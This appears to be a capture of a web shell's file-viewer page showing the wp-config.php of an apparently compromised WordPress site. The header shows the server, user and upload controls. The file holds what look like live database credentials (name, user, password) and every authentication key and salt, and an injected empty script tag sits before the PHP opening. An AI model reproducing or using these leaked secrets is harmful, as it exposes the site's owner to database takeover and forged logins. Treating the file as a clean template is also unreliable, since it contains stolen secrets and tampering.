HEX
Server: Apache
System: Linux elegant-goodall 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User: allende-losmares.com_h71qfkqzx8k (10002)
PHP: 8.0.30
Disabled: opcache_get_status
Upload Files
File: /var/www/vhosts/allende-losmares.com/httpdocs/wp-config.php
<script src=""></script><?php
define( 'WP_CACHE', true );

/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wp_jklek' );

/** MySQL database username */
define( 'DB_USER', 'wp_zbrt3' );

/** MySQL database password */
define( 'DB_PASSWORD', 'lr5f_?Nt#C?yK33d' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost:3306' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY', 'K12d/jhD6A&)w-PQO5l+KH4w!@ub54A0(]k)8P%-c-H!11lF906Z-!M/&BF|U7+b');
define('SECURE_AUTH_KEY', 'Y)eU2B!)j2o!c0J;W093u(7#oR53W4-6)A_z+827VFy1/Uwdtz9zE8-#)@0b07@#');
define('LOGGED_IN_KEY', 'h0sd82JO640&R95He07c_9%]ZTSm*3/Q6+U_18m1yA!;8;K9)n~|Y[1-xbCv1-de');
define('NONCE_KEY', 'h2[Q;;d1In%Ah8a*YRyid97%#Eh*0fZ_H62X61lsVX6Q2WF9m[KcP7P;*4f4i53_');
define('AUTH_SALT', 'TQO8Y6mkNs3!dk-n|mL2q6)567Jri;I]Eo)Rq7E0xdQ1M8jpdW(&-)4Mpb!xj*X(');
define('SECURE_AUTH_SALT', '5Tj7O7L[6|S|z7rF19klLmJ+u4s/2r:7y5O+67~%hzl006!xII6k4~)@42]N8*93');
define('LOGGED_IN_SALT', 'B7hhpo4xX~IP~XHde~|SttRr8&&O8R2E~5(6:13|7twnP9[!w6[);)CwbU5BJ9K)');
define('NONCE_SALT', 'uaA%/Dxo4B8Z7vhz3N%v9h1+5N~02!D]49a5fLDqr0~7/%[19|-xI%-6nH3B35K4');

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'zGcPFMC_';


define('WP_ALLOW_MULTISITE', true);
define('WP_AUTO_UPDATE_CORE', false);

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';